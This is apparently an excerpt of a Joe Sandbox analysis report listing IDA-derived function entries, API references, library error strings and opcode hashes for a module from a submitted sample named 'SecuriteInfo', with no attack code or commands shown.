                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                            • String ID: CryptoMaterial: this object does not support precomputation
                                            • API String ID: 2192554526-3625584042
                                            • Opcode ID: 96d0121d980e61ccb49b65f43003625175857fec60f1ba369e1bdfa3d5512bb6
                                            • Instruction ID: e91a054e26a4e9c963313a66d9238ede8bac796ea4605c5fd72ab69f9b2328de
                                            • Opcode Fuzzy Hash: 96d0121d980e61ccb49b65f43003625175857fec60f1ba369e1bdfa3d5512bb6
                                            • Instruction Fuzzy Hash: B53141B1904248AFCB14CF98D840BEEFBB8FB09714F20866EE42597B90D7759908CB90
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA3327
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEA336B
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1735018483-3788999226
                                            • Opcode ID: 4f1d67ef4cb28da25ef6d68d5cb3706bb78248059200d5307e9fb6a62df5d3bb
                                            • Instruction ID: d1e1034612e287883164071e6a04c16eac9c46b2f5f38f4b4063f3ddd376f345
                                            • Opcode Fuzzy Hash: 4f1d67ef4cb28da25ef6d68d5cb3706bb78248059200d5307e9fb6a62df5d3bb
                                            • Instruction Fuzzy Hash: 3A31D875B04115AFCB24DF98D880B9AB7B1EB45718F204729E9299FB80DB31ED05CBD1
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEB584D
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • VariantClear.OLEAUT32(00000000), ref: 6CEB5899
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 2677079660-3788999226
                                            • Opcode ID: d7cd5760444a4451637df91f371df924dd7f35d4c4f4d456329a4c9d6af95581
                                            • Instruction ID: c092bfe1b31a2b1c042855b7fba0ad44e49766ac31ddbe0a5967a40afc33f707
                                            • Opcode Fuzzy Hash: d7cd5760444a4451637df91f371df924dd7f35d4c4f4d456329a4c9d6af95581
                                            • Instruction Fuzzy Hash: 6C21B372A016059FD710CF68D980A6EB7F5FF84328F244A3EE465E7B40DB35A9008B90
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEA576B
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEA5782
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                            • String ID: string too long
                                            • API String ID: 963545896-2556327735
                                            • Opcode ID: 559298ea2276379374c1798689e634910ceaf16abf03b71e1dff975bab27e919
                                            • Instruction ID: 14bad461f155da1ca8054b6d25c9b0e0b97f0967c6251113f7459c11446d4909
                                            • Opcode Fuzzy Hash: 559298ea2276379374c1798689e634910ceaf16abf03b71e1dff975bab27e919
                                            • Instruction Fuzzy Hash: A1118733305B109FD321DE9CA880AAAF7F9AF95724B70061FF552DBF40C761984587A1
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE946C4
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CE9470B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: string too long
                                            • API String ID: 1785806476-2556327735
                                            • Opcode ID: 2660d7b76ee8726f2140005ffd4bb6cad563e412863a6491fccf37de0201ea23
                                            • Instruction ID: 9b3e36f1c56986e995b8a5880d2ccf72fd043f79bd0e9f0708ab95e03adb1139
                                            • Opcode Fuzzy Hash: 2660d7b76ee8726f2140005ffd4bb6cad563e412863a6491fccf37de0201ea23
                                            • Instruction Fuzzy Hash: DE11BC721153145FE7209D78A8D0A6AB7B9AF5231CF340B2FD4A787B82D771A4488752
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC4E00
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            • OutputBuffer, xrefs: 6CEC4D77
                                            • ArraySink: missing OutputBuffer argument, xrefs: 6CEC4D91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                            • API String ID: 3718517217-3781944848
                                            • Opcode ID: a41bf05127d56727dd917a74cfccc61d3fd82d6b60dffed82a2de01ab785ff66
                                            • Instruction ID: 9923f89c79d34337e0078e78c8e4ff60de45929310089acf34c5a7befd2747c7
                                            • Opcode Fuzzy Hash: a41bf05127d56727dd917a74cfccc61d3fd82d6b60dffed82a2de01ab785ff66
                                            • Instruction Fuzzy Hash: CE3114B151C380AFC310CF69C490A9ABBF4BB99714F508E1EF5A587B50DB75D908CB92
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA0201
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            • OutputStringPointer, xrefs: 6CEA018C
                                            • StringSink: OutputStringPointer not specified, xrefs: 6CEA019B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                            • API String ID: 3718517217-1331214609
                                            • Opcode ID: 73b70d3facb836e27c4474b551cf65e5d0674d9b1552e1621f083701cb9f4a21
                                            • Instruction ID: c28aaa1e9a06f7556f5c76a6ed98a4a359439ec3de18b736c46559c3cda13132
                                            • Opcode Fuzzy Hash: 73b70d3facb836e27c4474b551cf65e5d0674d9b1552e1621f083701cb9f4a21
                                            • Instruction Fuzzy Hash: 5A216FB1D04288AFCB14CFD9D890BEDFBB4EB59314F10865EE825A7B91DB355A08CB50
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94636
                                              • Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF913A
                                              • Part of subcall function 6CEF9125: __CxxThrowException@8.LIBCMT ref: 6CEF914F
                                              • Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF9160
                                            • _memmove.LIBCMT ref: 6CE9466F
                                            Strings
                                            • invalid string position, xrefs: 6CE94631
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: invalid string position
                                            • API String ID: 1785806476-1799206989
                                            • Opcode ID: eec2422a44dbd6f9e9d6e241fbfe454956b22ca184b2733059a2f363df551a69
                                            • Instruction ID: b0ce112be3df998f0fe2a8b6ae95a94c756faa7c8813ebc4f3434be3e1f2c0c1
                                            • Opcode Fuzzy Hash: eec2422a44dbd6f9e9d6e241fbfe454956b22ca184b2733059a2f363df551a69
                                            • Instruction Fuzzy Hash: 3901DBB23042404BD320CD5CDC8095AB7B6DBD1754B344A2ED1A5CBF02D6B1DC42C7A2
                                            APIs
                                            • type_info::operator!=.LIBCMT ref: 6CECACF8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: type_info::operator!=
                                            • String ID: Modulus$PublicExponent
                                            • API String ID: 2241493438-3324115277
                                            • Opcode ID: 10a6ca7c4e425ca63d29face544459ccbcc4f8a5407037fc014035598dd2cb82
                                            • Instruction ID: 457e6dda8b90b63f8753517860524ababfe729a7d2f089314db18bab93fdec77
                                            • Opcode Fuzzy Hash: 10a6ca7c4e425ca63d29face544459ccbcc4f8a5407037fc014035598dd2cb82
                                            • Instruction Fuzzy Hash: 5611BF71A083049EC300DF68CA4158BBBF4EFD6648F20465EF4A15BB60DB31994CCB93
                                            APIs
                                            • type_info::operator!=.LIBCMT ref: 6CEEB848
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: type_info::operator!=
                                            • String ID: Modulus$PublicExponent
                                            • API String ID: 2241493438-3324115277
                                            • Opcode ID: a55399f1562ec896407bbb1296e1840bbca5b37e5c03f273101f063b54ba9da7
                                            • Instruction ID: 70c02062a0893b2d475757a0af802cacd154af7d947b33c1083f5b7b7ca3e863
                                            • Opcode Fuzzy Hash: a55399f1562ec896407bbb1296e1840bbca5b37e5c03f273101f063b54ba9da7
                                            • Instruction Fuzzy Hash: 401101719093449EC300DF6C894148BBBF0AFDA288F20062EF8805BB50DB359948CB9A
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CECB605
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CECB634
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1785806476-3788999226
                                            • Opcode ID: 7dc1c7084b2d76bf12fc6f790504721763b4e1291458ec1e07573007f7de1f47
                                            • Instruction ID: 5ecc0365a315759663591d10ce139ab06db4c7e3bc6676b32a1c7345d546f4ae
                                            • Opcode Fuzzy Hash: 7dc1c7084b2d76bf12fc6f790504721763b4e1291458ec1e07573007f7de1f47
                                            • Instruction Fuzzy Hash: C20188B2A002059FD724DEA9DD91C5BB3E8EB54314724492DD5ABC3B50E671F8048B61
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEF4241
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CEF4277
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<bool> too long
                                            • API String ID: 1785806476-842332957
                                            • Opcode ID: e4894605ba059b66dcffd6e9f15998c490c28d754e24cf994f645a915a627a69
                                            • Instruction ID: b8f336871c55b08b4745b49c6867395a72e2f3bee385c25db4500a25bcfb1e9a
                                            • Opcode Fuzzy Hash: e4894605ba059b66dcffd6e9f15998c490c28d754e24cf994f645a915a627a69
                                            • Instruction Fuzzy Hash: 5C01D472A001055BD704CFA9DDD08AEB3B9FB84358F61423FE52687B40E731E90ACA90
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEF3855
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CEF3880
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1785806476-3788999226
                                            • Opcode ID: 0655b353c0a2557226d209e7502899e096ea0576591b121e1508ec6289c3bf50
                                            • Instruction ID: e752f624f040f246435029bc29c8fb275b6cc2d149f1e0264b1484fd8f65d31b
                                            • Opcode Fuzzy Hash: 0655b353c0a2557226d209e7502899e096ea0576591b121e1508ec6289c3bf50
                                            • Instruction Fuzzy Hash: 5C0171725006099FD314DEA9D884C9AB3E8EF442147614A3DE5AAD3B90EA75F8058B61
                                            APIs
                                              • Part of subcall function 6CEFABC3: __getptd.LIBCMT ref: 6CEFABC9
                                              • Part of subcall function 6CEFABC3: __getptd.LIBCMT ref: 6CEFABD9
